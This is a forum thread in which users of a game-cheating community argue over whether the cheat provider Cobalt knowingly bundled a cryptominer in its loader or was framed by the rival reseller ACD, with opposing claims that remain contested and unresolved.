& how did Cobalt's server get infiltrated sot hat the loader could be tampered with & tampered copy retained?

Cobalt did this shit. Cobalt is spreading malware & counting on user stupidity to get away with it. They are malware distributors. They even admitted it, just not the part where they admit it was them who added it.

It's very obvious they put ACD's Discord server ID in their own malware to frame them. That doesn't mean ACD did it. Why would ACD send information to their public Discord server anyways, and not a secure private location?

Even if this was all somehow true (it's not), good luck with a provider that has such shit security that anyone can just spread malware to their users via their own website loader.

Do not support malware distributors please.

No im not a part of their staff or even a customer.

1. It isn't unheard of in the cheating community for providers to crack other providers software to use it a harmful way.

2. The fact that it wasn't all client.exe that had the miner in them (Actually a small % of clients did) seems to me that it didn't come from their website, it was most likely a cracked version of the loader that had the miner. And that loader was most likely shared through out the discord.

3. Why ACD allegedly have sent the information to their main server i do not know, but people in the cheating community aren't always the smartest. Note that ACD doesn't dev anything them self, they are reselling their software.

4. The security of Cobalt i cannot speak about since i don't know about it. But again it isn't unheard of providers cracking other providers in the cheating community.

5. Again i don't think the client.exe was spread through their website, but most likely was a cracked version of their loader, that was spread through discord.

6. I don't see any reason for Cobalt to spread a miner to their users, they are growing rapidly, also faster than any other providers atm. Why ruin a growing good business? That in my eyes doesn't make any sense at all.

But for other providers this isn't good, the fast that both Cobalt and ACD have been seen as cheats you use for raging give them the same user base.

Cobalt is also 1/5 of the price of ACD cheat + spoofer.

I believe that ACD have more benefits for ruining Cobalt reputation/sales than Cobalt would have to rat their own customers.

I do not support malware distributors. But i also wont join on the hype train to accuse a provider, that in the most logically way probably haven't done anything wrong other than having a weak protection against debugging and are being stupid enough to allow share a client.exe in their general channel on discord.

I hope that people can make their own choice on who they believe in the right and who isn't. But it was not my intention to accuse ACD, i indented for this information to be public to people can make their own choice.

Good day

[zebleer]

Quote:

Originally Posted by lort1234

No im not a part of their staff or even a customer.

1. It isn't unheard of in the cheating community for providers to crack other providers software to use it a harmful way.

2. The fact that it wasn't all client.exe that had the miner in them (Actually a small % of clients did) seems to me that it didn't come from their website, it was most likely a cracked version of the loader that had the miner. And that loader was most likely shared through out the discord.

3. Why ACD allegedly have sent the information to their main server i do not know, but people in the cheating community aren't always the smartest. Note that ACD doesn't dev anything them self, they are reselling their software.

4. The security of Cobalt i cannot speak about since i don't know about it. But again it isn't unheard of providers cracking other providers in the cheating community.

5. Again i don't think the client.exe was spread through their website, but most likely was a cracked version of their loader, that was spread through discord.

6. I don't see any reason for Cobalt to spread a miner to their users, they are growing rapidly, also faster than any other providers atm. Why ruin a growing good business? That in my eyes doesn't make any sense at all.

But for other providers this isn't good, the fast that both Cobalt and ACD have been seen as cheats you use for raging give them the same user base.

Cobalt is also 1/5 of the price of ACD cheat + spoofer.

I believe that ACD have more benefits for ruining Cobalt reputation/sales than Cobalt would have to rat their own customers.

I do not support malware distributors. But i also wont join on the hype train to accuse a provider, that in the most logically way probably haven't done anything wrong other than having a weak protection against debugging and are being stupid enough to allow share a client.exe in their general channel on discord.

I hope that people can make their own choice on who they believe in the right and who isn't. But it was not my intention to accuse ACD, i indented for this information to be public to people can make their own choice.

Good day

1. It isn't unheard of in the cheating community for providers to crack other providers software to use it a harmful way.
The malware analysts who evaluated Cobalt and found what Cobalt admitted was found got it from cobalt.solutions, the primary website. Cobalt also said nothing about a crack but that is secondary evidence.

2. The fact that it wasn't all client.exe that had the miner in them (Actually a small % of clients did) seems to me that it didn't come from their website, it was most likely a cracked version of the loader that had the miner. And that loader was most likely shared through out the discord.
So you've never heard of evasive malware? That is a factor of malware analysis. Malware might remain inactive for long periods of time before starting activity, it might be present in only a few instances of production, etc. These are all examples of evasive measures for malware.

3. Why ACD allegedly have sent the information to their main server i do not know, but people in the cheating community aren't always the smartest. Note that ACD doesn't dev anything them self, they are reselling their software.
Yes I know ACD is a reseller so how are they somehow able to hack Cobalt's website and alter a VMP protected loader for download? If they are somehow smart enough to do that, they aren't going to be stupid enough to leave a trail to their main Discord server which is not secure, not anonymous, and might get deleted at any time.

4. The security of Cobalt i cannot speak about since i don't know about it. But again it isn't unheard of providers cracking other providers in the cheating community.
Already answered #1.

5. Again i don't think the client.exe was spread through their website, but most likely was a cracked version of their loader, that was spread through discord.
It came from their website. People aren't distributing cheat provider loaders on Discord unless it's advertised cracked, which Cobalt didn't get cracked. They get the shit from the website like everyone else.

6. I don't see any reason for Cobalt to spread a miner to their users, they are growing rapidly, also faster than any other providers atm. Why ruin a growing good business? That in my eyes doesn't make any sense at all.
Yeah their free and 10 eur products are really flying off the shelf because they're good and not because they are cheap. When something is free or cheap in the cheat scene, your device might be what they get, not your money.

But for other providers this isn't good, the fast that both Cobalt and ACD have been seen as cheats you use for raging give them the same user base.
Cobalt is also 1/5 of the price of ACD cheat + spoofer.
I believe that ACD have more benefits for ruining Cobalt reputation/sales than Cobalt would have to rat their own customers.
Yeah ACD seems to be profit driven while Cobalt seems to be malware infection driven. Not sure why you're surprised by the price difference. Cobalt has given away a lot for "free" too. Nothing in life is free.

I do not support malware distributors. But i also wont join on the hype train to accuse a provider, that in the most logically way probably haven't done anything wrong other than having a weak protection against debugging and are being stupid enough to allow share a client.exe in their general channel on discord.
I hope that people can make their own choice on who they believe in the right and who isn't. But it was not my intention to accuse ACD, i indented for this information to be public to people can make their own choice.
The proof is legitimately overwhelming that Cobalt is a malware distributor. This is not a hype train.

[lort1234]

Quote:

Originally Posted by zebleer

1. It isn't unheard of in the cheating community for providers to crack other providers software to use it a harmful way.
The malware analysts who evaluated Cobalt and found what Cobalt admitted was found got it from cobalt.solutions, the primary website. Cobalt also said nothing about a crack but that is secondary evidence.

"Allegedly" came from their website.

2. The fact that it wasn't all client.exe that had the miner in them (Actually a small % of clients did) seems to me that it didn't come from their website, it was most likely a cracked version of the loader that had the miner. And that loader was most likely shared through out the discord.
So you've never heard of evasive malware? That is a factor of malware analysis. Malware might remain inactive for long periods of time before starting activity, it might be present in only a few instances of production, etc. These are all examples of evasive measures for malware.

I am aware of evasive malware. But even if it where evasive malware the dmr.exe file should still be there, which it wasn't for the majority of users. As i wrote on a small % of users have had this dmr.exe file on their system.

3. Why ACD allegedly have sent the information to their main server i do not know, but people in the cheating community aren't always the smartest. Note that ACD doesn't dev anything them self, they are reselling their software.
Yes I know ACD is a reseller so how are they somehow able to hack Cobalt's website and alter a VMP protected loader for download? If they are somehow smart enough to do that, they aren't going to be stupid enough to leave a trail to their main Discord server which is not secure, not anonymous, and might get deleted at any time.

That might be true, unless they didn't think about it.

4. The security of Cobalt i cannot speak about since i don't know about it. But again it isn't unheard of providers cracking other providers in the cheating community.
Already answered #1.

5. Again i don't think the client.exe was spread through their website, but most likely was a cracked version of their loader, that was spread through discord.
It came from their website. People aren't distributing cheat provider loaders on Discord unless it's advertised cracked, which Cobalt didn't get cracked. They get the shit from the website like everyone else.

I think you should investigate some more, since you have no information about this. Client have been shared a lot in the Cobalt discord server, anyone that have the slightest insight of this would know this is true.

6. I don't see any reason for Cobalt to spread a miner to their users, they are growing rapidly, also faster than any other providers atm. Why ruin a growing good business? That in my eyes doesn't make any sense at all.
Yeah their free and 10 eur products are really flying off the shelf because they're good and not because they are cheap. When something is free or cheap in the cheat scene, your device might be what they get, not your money.

Yes they are. That's is not true at all, just because they are cheap doesn't mean they are "after your device" it can be a good step to start up a business and get customers. And then after a while you either raise the price or keep it as it is and get more customers.

But for other providers this isn't good, the fast that both Cobalt and ACD have been seen as cheats you use for raging give them the same user base.
Cobalt is also 1/5 of the price of ACD cheat + spoofer.
I believe that ACD have more benefits for ruining Cobalt reputation/sales than Cobalt would have to rat their own customers.
Yeah ACD seems to be profit driven while Cobalt seems to be malware infection driven. Not sure why you're surprised by the price difference. Cobalt has given away a lot for "free" too. Nothing in life is free.

This statement is just not proven.

I do not support malware distributors. But i also wont join on the hype train to accuse a provider, that in the most logically way probably haven't done anything wrong other than having a weak protection against debugging and are being stupid enough to allow share a client.exe in their general channel on discord.
I hope that people can make their own choice on who they believe in the right and who isn't. But it was not my intention to accuse ACD, i indented for this information to be public to people can make their own choice.
The proof is legitimately overwhelming that Cobalt is a malware distributor. This is not a hype train.

The there is proof for both sides of the story.

Again as i said this thread was to spread information. People can think for them self and decide what they want to believe. Because as mentioned there is proof on both sides of the story.

[Satan]

This one here should be enough to discuss:


#closed